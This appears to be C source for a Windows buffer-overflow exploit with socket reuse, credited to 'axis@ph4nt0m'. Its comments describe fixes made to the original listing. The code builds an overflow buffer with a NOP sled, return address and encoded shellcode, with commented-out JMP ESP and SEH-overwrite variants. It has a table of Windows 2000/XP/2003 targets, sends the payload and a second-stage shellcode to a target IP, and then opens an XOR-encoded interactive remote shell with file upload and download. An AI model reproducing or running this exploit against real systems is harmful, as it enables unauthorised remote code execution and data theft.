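/*
 * Build the overflow buffer for server.exe in the global Payload[] and
 * dump it with PrintSc().
 *
 * Layout written here (server.exe):
 *   [0..51]   0x90 NOP sled
 *   [52..55]  os[q].ret, the 4-byte return address for target q (raw copy)
 *   [56..]    the encoded shellcode from sh_Buff; the NUL that strcpy would
 *             leave after it is replaced by 0x90 so the sled is unbroken.
 *
 * The last byte of Payload is left out of the memset, as in the original
 * (for a file-scope array it is zero).  The shellcode copy is now bounded:
 * if sh_Buff plus its terminator does not fit between offset 56 and the
 * end of Payload, an error is printed and nothing is written, instead of
 * strcpy running past the array.
 *
 * q is not range-checked here; main() is expected to validate it against
 * the os[] table before calling.
 */
void Make_Payload(int q)
{
	const size_t sc_off = 56;
	size_t sc_len = strlen((const char *)sh_Buff);

	/* +1: strcpy's NUL (overwritten below) must also stay inside Payload */
	if (sc_off + sc_len + 1 > sizeof(Payload)) {
		printf("[-] Shellcode (%u bytes) does not fit in Payload.\n", (unsigned)sc_len);
		return;
	}

	// server.exe
	memset(Payload, 0x90, sizeof(Payload) - 1);
	memcpy(Payload + 52, &os[q].ret, 4);
	memcpy(Payload + sc_off, sh_Buff, sc_len + 1);
	Payload[sc_off + sc_len] = '\x90'; // replace the \x00 strcpy would leave after the shellcode

	/*
	// server_big.exe jmp esp
	memset(Payload, 0x90, sizeof(Payload)-1);
	memcpy(Payload + 1204, &os[q].ret, 4);
	strcpy(Payload + 1208, (const char *)sh_Buff);
	memcpy(Payload + 1208 + strlen((const char *)sh_Buff), "\x90", 1);
	*/
	/*
	// server_big.exe overwrite esp+8 (seh)
	// server_big.exe: overwrite SEH
	memset(Payload, 0x90, sizeof(Payload)-1);
	memcpy(Payload + 1204, POP_POP_RET, 4); // overwrite eip with pop/pop/ret
	memcpy(Payload + 1208, &os[q].ret, 4); // overwrite esp
	memcpy(Payload + 1212, &os[q].ret, 4); // overwrite esp+4
	memcpy(Payload + 1216, &os[q].ret, 4); // overwrite SEH with jmp esp
	// memcpy(Payload + 1220, "\x00", 1);
	strcpy(Payload + 1220, (const char *)sh_Buff);
	memcpy(Payload + 1220 + strlen((const char *)sh_Buff), "\x90", 1);
	*/
	PrintSc((unsigned char *)Payload, sizeof(Payload));
}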
- // ripped from isno
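/*
 * Open a TCP connection to address:port, waiting at most `timeout` seconds
 * for the connect to complete.
 *
 * Returns the connected (blocking) socket cast to int, or a negative code:
 *   -1 socket() failed
 *   -2 address is not a usable dotted quad (0.0.0.0 or unparsable)
 *   -3 select() failed
 *   -4 connect timed out
 *   -5 connect failed (immediate error or SO_ERROR != 0)
 *
 * The SOCKET-through-int return is the original contract; callers must keep
 * the result in an int to see the sign of an error code (a SOCKET is
 * unsigned, so "s < 0" on a SOCKET variable never fires).
 */
int Make_Connection(char *address, int port, int timeout)
{
	struct sockaddr_in target;
	SOCKET s;
	int rc, optlen;
	DWORD opt;
	fd_set wd;
	struct timeval tv;

	s = socket(AF_INET, SOCK_STREAM, 0);
	/* SOCKET is unsigned: the original "s < 0" could never be true */
	if (s == INVALID_SOCKET)
		return -1;

	memset(&target, 0, sizeof(target));
	target.sin_family = AF_INET;
	target.sin_addr.s_addr = inet_addr(address);
	/* inet_addr() reports a malformed address as INADDR_NONE, not 0 */
	if (target.sin_addr.s_addr == 0 || target.sin_addr.s_addr == INADDR_NONE) {
		closesocket(s);
		return -2;
	}
	target.sin_port = htons((unsigned short)port);

	/* non-blocking so the connect can be timed with select() */
	opt = 1;
	ioctlsocket(s, FIONBIO, &opt);

	/* in non-blocking mode connect() normally "fails" with WSAEWOULDBLOCK and
	   completes in the background; anything else is a real failure */
	if (connect(s, (struct sockaddr *)&target, sizeof(target)) == SOCKET_ERROR
	    && WSAGetLastError() != WSAEWOULDBLOCK) {
		closesocket(s);
		return -5;
	}

	tv.tv_sec = timeout;
	tv.tv_usec = 0;
	FD_ZERO(&wd);
	FD_SET(s, &wd);
	rc = select((int)s + 1, NULL, &wd, NULL, &tv); /* nfds is ignored on Winsock */
	if (rc == SOCKET_ERROR) {
		closesocket(s);
		return -3;
	}
	if (rc == 0) {
		closesocket(s);
		return -4;
	}

	/* writable may also mean "connect failed": ask for the pending error */
	opt = 0;
	optlen = sizeof(int);
	if (getsockopt(s, SOL_SOCKET, SO_ERROR, (char *)&opt, &optlen) != 0
	    || opt != 0 || optlen != sizeof(int)) {
		closesocket(s);
		return -5;
	}

	/* back to blocking mode for the rest of the session */
	opt = 0;
	ioctlsocket(s, FIONBIO, &opt);
	return (int)s;
}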
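/*
 * XOR every byte of buf[0..size) with the global Xor_key, in place.
 * The encoding is symmetric, so the same call encodes outgoing traffic and
 * decodes incoming traffic in shell().
 *
 * size <= 0 is a no-op; callers pass recv()'s return value straight in, so
 * this must tolerate -1.  (The loop header was mangled in the published
 * listing; this is the evident "for (i = 0; i < size; i++)".)
 */
void xor_buf(unsigned char *buf, int size)
{
	int i;

	for (i = 0; i < size; i++) {
		buf[i] ^= Xor_key;
	}
}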
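/* ripped from TESO code and modifed by ey4s for win32 */

/*
 * Extract the local file name from a "get ..." / "put ..." command line.
 * Same parse as the original: the last byte (the newline) is dropped, the
 * line is scanned backwards for the last '\\' or ' ', and the text after it
 * is the name.  The scan starts at buf[l-1], never buf[l]: that byte is
 * stale data (or one past the array when l == sizeof buf), and a stray ' '
 * there made the original copy length negative.
 * Requires l > 0.  Returns 0, or -1 if the name plus terminator does not
 * fit in out[out_size] (the original strncpy could overrun filename[128]).
 */
static int command_filename(char *buf, int l, char *out, size_t out_size)
{
	int i;
	size_t len;

	buf[l - 1] = 0;
	for (i = l - 1; i > 0; i--) {
		if (buf[i] == '\\' || buf[i] == ' ')
			break;
	}
	len = (size_t)(l - i - 1);
	if (len >= out_size)
		return -1;
	memcpy(out, buf + i + 1, len);
	out[len] = 0;
	return 0;
}

/*
 * Wait up to one second for sock to become readable.
 * Returns select()'s result: 1 readable, 0 timeout, SOCKET_ERROR on error.
 * Uses a real fd_set instead of the original two-unsigned-long cast, which
 * only matched fd_set's layout while SOCKET and unsigned long were the same
 * size (32-bit builds).
 */
static int wait_readable(int sock)
{
	fd_set rd;
	struct timeval tv;

	tv.tv_sec = 1;
	tv.tv_usec = 0;
	FD_ZERO(&rd);
	FD_SET(sock, &rd);
	return select(0, &rd, NULL, NULL, &tv);
}

/*
 * "get": receive the remote file body into hFile.  The transfer ends when
 * the socket stays quiet for one second, after which an encoded newline is
 * sent to the peer (as the original did), or when recv() returns <= 0 or
 * WriteFile fails (the original looped forever on a closed connection and
 * passed -1 to WriteFile as a length).  Returns bytes written to hFile.
 */
static int receive_file(int sock, HANDLE hFile, char *buf, int buf_size)
{
	int size = 0;
	int l;
	DWORD written;

	for (;;) {
		l = recv(sock, buf, buf_size, 0);
		if (l <= 0)
			break;
		xor_buf((unsigned char *)buf, l);
		if (!WriteFile(hFile, buf, (DWORD)l, &written, NULL))
			break;
		size += (int)written;

		if (wait_readable(sock) != 1) {
			/* quiet socket: end of file; tell the peer with an encoded '\n' */
			buf[0] = 0x0a;
			xor_buf((unsigned char *)buf, 1);
			send(sock, buf, 1, 0);
			break;
		}
	}
	return size;
}

/*
 * "put": read hFile in buf_size chunks, encode each and send it.
 * Stops at EOF, when ReadFile fails (the original ignored the result and
 * reused the previous count), or when send() fails.  Returns bytes sent.
 */
static int send_file(int sock, HANDLE hFile, char *buf, int buf_size)
{
	int size = 0;
	int l;
	DWORD got;

	for (;;) {
		if (!ReadFile(hFile, buf, (DWORD)buf_size, &got, NULL) || got == 0)
			break;
		xor_buf((unsigned char *)buf, (int)got);
		l = send(sock, buf, (int)got, 0);
		if (l <= 0)
			break;
		size += l;
	}
	return size;
}

/*
 * Interactive session over the already-exploited socket.
 *
 * Each iteration waits one second for remote data; if some arrives it is
 * decoded and written to stdout.  Otherwise one line is read from stdin,
 * encoded and sent.  Two local commands are recognised in what was sent:
 *   get <path>   receive a file from the peer into ./<basename>
 *   put <path>   send the local file <basename> to the peer
 * The command line itself goes to the peer unchanged; the remote side is
 * assumed to implement the matching transfer.
 * All traffic is XORed with Xor_key (see xor_buf).  Returns when either
 * side of the connection goes away.
 */
void shell(int sock)
{
	int l, size;
	char buf[1024];
	char filename[128];
	HANDLE hFile;

	for (;;) {
		if (wait_readable(sock) == 1) {
			/* remote -> local */
			l = recv(sock, buf, sizeof(buf), 0);
			if (l <= 0) {
				printf("[-] Connection closed.\n");
				return;
			}
			xor_buf((unsigned char *)buf, l);
			l = write(1, buf, l);
			if (l <= 0) {
				printf("[-] Connection closed.\n");
				return;
			}
			continue;
		}

		/* local -> remote */
		l = read(0, buf, sizeof(buf));
		if (l <= 0) {
			printf("[-] Connection closed.\n");
			return;
		}
		xor_buf((unsigned char *)buf, l);
		l = send(sock, buf, l, 0);
		if (l <= 0) {
			printf("[-] Connection closed.\n");
			return;
		}
		/* decode the part that was actually sent so the command can be inspected */
		xor_buf((unsigned char *)buf, l);

		//+--------------------------------------------
		// get xxx download xxx
		// put xxx upload xxx
		//+--------------------------------------------
		if (strncmp(buf, "get", 3) == 0) {
			if (command_filename(buf, l, filename, sizeof(filename)) != 0) {
				printf("[-] Filename too long.\n");
				continue;
			}
			/* CREATE_ALWAYS: an existing local file of that name is overwritten */
			hFile = CreateFile(filename,
			                   GENERIC_READ | GENERIC_WRITE,
			                   FILE_SHARE_READ,
			                   NULL,
			                   CREATE_ALWAYS,
			                   FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_ARCHIVE,
			                   NULL);
			if (hFile == INVALID_HANDLE_VALUE) {
				printf("Create File %s Error!\n", filename);
				continue;
			}
			size = receive_file(sock, hFile, buf, (int)sizeof(buf));
			printf("Download remote file %s (%d bytes)!\n", filename, size);
			CloseHandle(hFile);
		} else if (strncmp(buf, "put", 3) == 0) {
			Sleep(1000);

			if (command_filename(buf, l, filename, sizeof(filename)) != 0) {
				printf("[-] Filename too long.\n");
				continue;
			}
			hFile = CreateFile(filename,
			                   GENERIC_READ | GENERIC_WRITE,
			                   FILE_SHARE_READ,
			                   NULL,
			                   OPEN_EXISTING,
			                   FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_ARCHIVE,
			                   NULL);
			if (hFile == INVALID_HANDLE_VALUE) {
				printf("Open File %s Error!\n", filename);
				continue;
			}
			size = send_file(sock, hFile, buf, (int)sizeof(buf));
			printf("Upload remote file %s (%d bytes)...", filename, size);
			/* the peer's reply to the upload; ignored if the socket is gone */
			l = recv(sock, buf, sizeof(buf), 0);
			if (l > 0) {
				xor_buf((unsigned char *)buf, l);
				write(1, buf, l);
			}
			CloseHandle(hFile);
		}
	}
}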
/*
 * Close the session socket and tear down Winsock.
 * Call once, after shell() returns; nothing else should use s afterwards.
 */
void Disconnect(SOCKET s)
{
	(void)closesocket(s);
	(void)WSACleanup();
}
/*
 * Print the banner, the usage line (with n as the program name) and the
 * OSType table to stdout.  Output is identical to the original printf
 * sequence; the fixed lines live in tables and go out via puts().
 */
void help(char *n)
{
	static const char *const banner[] = {
		"+--------------------------------------------------------+",
		" Reuse port (Find Sock) Exploit by axis@ph4nt0m",
		" Ver 1.0 Please Keep it Private!",
		"+--------------------------------------------------------+",
		" Usage:",
	};
	static const char *const targets[] = {
		" 0. Windows CN ALL SP1 POP/POP/RET ",
		" 1. Windows2000 SP3/SP4 ALL POP/POP/RET",
		" 2. Windows CN ALL JMP ESP from ansi page",
		" 3. Windows2003 CN SP1 CALL EAX",
		" 4. WindowsXP CN SP2 JMP EAX",
		" 5. TEST RET",
	};
	size_t k;

	for (k = 0; k < sizeof(banner) / sizeof(banner[0]); k++)
		puts(banner[k]);
	printf(" %s [Target IP] [Target Port] [OSType]\n\n", n);
	puts(" == OSType:");
	for (k = 0; k < sizeof(targets) / sizeof(targets[0]); k++)
		puts(targets[k]);
}
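/*
 * Entry point: <Target IP> <Target Port> <OSType>.
 *
 * Generates the shellcode, connects to the target, sends the overflow
 * buffer built by Make_Payload() followed by magic_shellcode, then reuses
 * the same socket for the interactive shell().
 *
 * Fixes over the original:
 *  - the connect result is kept in an int; storing it in a SOCKET (unsigned)
 *    meant Make_Connection's negative error codes were never detected;
 *  - port and OSType are parsed with strtol and range-checked (atoi turned
 *    "abc"/70000 into a wrong port, and an OSType outside os[] indexed past
 *    the table);
 *  - send() results are checked;
 *  - %d was used for a size_t.
 * Exit status is 0 on success, 1 on any failure (the original returned 1
 * on success too).
 */
int main(int argc, char *argv[])
{
	unsigned short port;
	int conn;        /* int on purpose: Make_Connection's errors are negative */
	SOCKET s;
	WSADATA WSAData;
	long v;
	char *end;
	int p;

	if (argc != 4) {
		help(argv[0]);
		return 0;
	}

	v = strtol(argv[2], &end, 10);
	if (end == argv[2] || *end != '\0' || v < 1 || v > 65535) {
		fprintf(stderr, "[-] Bad port: %s\n", argv[2]);
		return 1;
	}
	port = (unsigned short)v;

	/* OS type: index into the os[] target table.  The count assumes os is an
	   array defined in this file (it is indexed as os[q].ret above). */
	v = strtol(argv[3], &end, 10);
	if (end == argv[3] || *end != '\0' || v < 0
	    || (size_t)v >= sizeof(os) / sizeof(os[0])) {
		fprintf(stderr, "[-] Bad OSType: %s\n", argv[3]);
		help(argv[0]);
		return 1;
	}
	p = (int)v;

	GetShellCode();
	if (!sh_Len) {
		printf("[-] Shellcode generate error.\n");
		exit(1);
	}
	printf("shellcode length is: %u \n", (unsigned)strlen((char *)sh_Buff));

	if (WSAStartup(MAKEWORD(1, 1), &WSAData) != 0) {
		fprintf(stderr, "[-] WSAStartup failed.\n");
		exit(1);
	}

	conn = Make_Connection(argv[1], port, 10);
	if (conn < 0) {
		fprintf(stderr, "[-] connect err.\n");
		WSACleanup();
		exit(1);
	}
	s = (SOCKET)conn;

	Make_Payload(p);

	//Send our evil Payload
	printf("[+]Sending our Evil Payload.\n");
	if (send(s, Payload, sizeof(Payload), 0) == SOCKET_ERROR) {
		fprintf(stderr, "[-] send failed.\n");
		Disconnect(s);
		exit(1);
	}
	Sleep(100);
	// send real shellcode
	if (send(s, magic_shellcode, Magic_Len, 0) == SOCKET_ERROR) {
		fprintf(stderr, "[-] send failed.\n");
		Disconnect(s);
		exit(1);
	}
	Sleep(1000);

	// use same socket to get shell
	shell(s);
	Disconnect(s);
	return 0;
}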